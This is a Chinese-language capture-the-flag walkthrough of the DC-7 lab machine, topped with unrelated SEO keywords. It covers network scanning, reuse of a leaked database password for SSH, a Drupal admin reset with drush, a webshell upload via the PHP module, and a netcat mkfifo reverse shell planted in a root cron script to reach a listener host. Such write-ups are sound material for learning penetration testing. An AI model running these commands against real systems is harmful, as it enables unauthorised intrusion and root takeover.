深圳高端网站建设多少钱,网站logo怎么做才清晰,策划网站建设价格,优良的网站邮箱服务器提供商isp文章目录信息搜集账号密码获取修改密码反弹shell得到flag信息搜集
首先获取目标ip。
arp-scan -l
nmap -sP 192.168.28.0/24得到目标ip为#xff1a;
192.168.28.139先访问页面。 翻译一下。 欢迎来到 DC-7DC-7引入了一些“新”概念#xff0c;但我会让你弄清楚它们是什么…
文章目录信息搜集账号密码获取修改密码反弹shell得到flag信息搜集
首先获取目标ip。
arp-scan -l
nmap -sP 192.168.28.0/24得到目标ip为
192.168.28.139先访问页面。 翻译一下。 欢迎来到 DC-7DC-7引入了一些“新”概念但我会让你弄清楚它们是什么。 :-)虽然这个挑战并不是那么技术性但如果您需要诉诸暴力破解或字典攻击您可能不会成功。你要做的是“跳出框框”思考。“在”盒子外面。 :-)提示说明本题不需要爆破密码下边又发现了一个提示。 账号密码获取
直接搜索DC7USERstaffdb/config.php at master · Dc7User/staffdb (github.com)
发现账号和密码。
?php$servername localhost;$username dc7user;$password MdR3xOgB7#dW;$dbname Staff;$conn mysqli_connect($servername, $username, $password, $dbname);
?但是却没法登录扫目录也没发现其他登录服务利用nmap扫描一下端口。
nmap -sV -A 192.168.28.139发现开放22端口尝试ssh登录成功。
ssh dc7user192.168.28.139然后在该用户下发现邮件信息。 修改密码
发现sh执行文件查看。
cat /opt/scripts/backups.sh发现drush命令使用该命令修改admin的密码。
drush user-password admin --password123456成功。
反弹shell
登陆后在Extend中发现可以安装模块尝试安装php模块。
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
下载后解压上传即可然后上传webshell。 编辑完成后保存访问同时本地打开接收。 然后进入交互模式。
python -c import pty;pty.spawn(/bin/bash)无法找到flag尝试提权利用刚刚的可执行文件提权设定定时任务。
echo rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 192.168.28.142 4444 /tmp/f back*得到flag
时间有点长,反弹后直接到root中找flag即可。
